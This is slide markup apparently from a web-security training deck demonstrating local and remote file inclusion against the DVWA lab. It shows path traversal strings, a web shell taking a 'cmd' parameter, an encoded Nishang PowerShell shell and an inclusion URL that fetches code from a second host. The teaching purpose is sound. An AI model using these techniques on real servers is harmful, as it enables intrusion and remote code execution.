              <a:t> 	%2E%2E%2F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83888596-DF4C-4C90-AD00-F35C10FEFE04}"/>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A6EB59A1-2B58-4A68-B474-1865B63DA6C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>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9657A0CA-3452-40FB-92F1-12FCDB28703D}"/>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0A773807-5306-4458-A8BA-92C43ED13792}"/>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98207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4AE97-C15B-46FD-B077-BFA5F25660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2863C11-B258-4C4B-8507-B49CD134CD8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local File Inclusion Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90126EDF-AEEA-441E-BE49-835797081EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="670869" y="1268229"/>
            <a:ext cx="10596560" cy="731519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4C5807-5EC0-4D1E-B86F-B4BF169FE4EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7839176" y="1268229"/>
            <a:ext cx="2447824" cy="731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667D2BC-A99C-4965-AB3D-7EA45EEFC196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7631193" y="874683"/>
            <a:ext cx="28777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a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Indicator of potential LFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF320C7-6278-4629-9051-C5A0C547C3DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="475001" y="2166688"/>
            <a:ext cx="11262465" cy="1237901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ACF2E97-F597-4984-9F36-7B28D376302B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475001" y="3545841"/>
            <a:ext cx="11364079" cy="940323"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this example, server is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – typically at c:\xampp\htdocs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on URL, this is then further down: \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\vulnerabilities\fi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FE3ACC8-4927-4A4A-BDB5-79B584CAEDFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7991575" y="2170261"/>
            <a:ext cx="3275853" cy="542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A6817144-2D4A-4C17-8A90-793B562F16C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434051" y="3046641"/>
            <a:ext cx="927390" cy="26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3" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84FDD9D6-C35C-4E17-ABCF-7FEA020802C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475000" y="4357975"/>
            <a:ext cx="11262465" cy="1510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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>../	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>../	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>../	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>../	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="8FD8F8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>users/…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C789DD93-7EB5-4B6C-98C2-EC4620C385CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441419" y="5196814"/>
            <a:ext cx="60290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F7F7D0D4-901C-4F09-8166-AAD257ECB1FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441419" y="5259627"/>
            <a:ext cx="18828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panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>vuln...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A419D58-4F43-49DB-B1A2-EF9EDC81DB99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691099" y="5810173"/>
            <a:ext cx="30413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C000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFC000"/>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82762CED-1D54-4043-A1CB-24989E776A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3971027" y="5254793"/>
            <a:ext cx="30413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FF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>htdocs</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF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4B5C9823-089D-420B-8B0A-C474A6080ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5491679" y="5742963"/>
            <a:ext cx="30413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4FBA6F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xampp</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="4FBA6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F7B73D0A-C872-4706-88EB-1B28D52B8434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6946395" y="5148062"/>
            <a:ext cx="95343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B050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDC83370-EA0E-4C57-8E9B-339F221330C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2691099" y="5148062"/>
            <a:ext cx="71979" cy="288642"/>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01AA21-41CA-4D9E-BA8D-843AE9E589D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3320079" y="5148062"/>
            <a:ext cx="291570" cy="739222"/>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318C63-2279-4109-813D-1C2F037EFBFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4564017" y="5109652"/>
            <a:ext cx="9914" cy="2811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E78273-2C28-41CD-A185-B870634D11AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5469323" y="5162124"/>
            <a:ext cx="626677" cy="72516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A1BE08-0B9B-4398-82E4-AD6F809532E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6446849" y="5148062"/>
            <a:ext cx="499546" cy="262603"/>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537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87613C-0EB6-44A1-BE1B-52921845ED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7E4C528-EDF2-4F7D-9175-723F31897D26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote File Inclusion Example – Web Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32761301-1C41-4B94-BBC9-BE4A94DD734A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="891209"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Less common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loads a resource remotely, no traversal needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB2CF99F-E0A8-437C-BDAB-018CBE6BBF16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2452559" y="2362215"/>
            <a:ext cx="6785757" cy="1142571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFACF61B-4006-4E90-BC6C-6DDDA2B7F8C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="498334" y="3664331"/>
            <a:ext cx="11280084" cy="1142571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41ED67C1-034C-4BA7-9C5E-CFACCD0BADF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7361656" y="3652399"/>
            <a:ext cx="4332010" cy="553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786EF17C-D1FA-40CD-8972-FDF6B463BBC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413582" y="4439920"/>
            <a:ext cx="1669218" cy="4779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Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F8A7C0C-1F70-4408-B6A5-4C8D6BD2D7C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248191" y="4981829"/>
            <a:ext cx="11364079" cy="940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Simple shell takes GET parameter '</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rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>' and executes it on the server</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Send a request with &amp;</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rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=&lt;command&gt;</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1745648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87613C-0EB6-44A1-BE1B-52921845ED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7E4C528-EDF2-4F7D-9175-723F31897D26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote File Inclusion Example – Code Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F8A7C0C-1F70-4408-B6A5-4C8D6BD2D7C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4962784"/>
            <a:ext cx="11364079" cy="940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Encoded </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rPr>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> command using a </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rPr>
              <a:t>Nishang</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> shell</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Ability to upload/execute arbitrary PHP (or ASPX on IIS) is very dangerous</a:t>
            </a:r>
          </a:p>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endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5AC6E4-311C-4979-9A4E-D59C82C00357}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1330960"/>
            <a:ext cx="109118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http://192.168.100.128/</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cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a: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/vulnerabilities/fi/?page=http://192.168.100.129/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
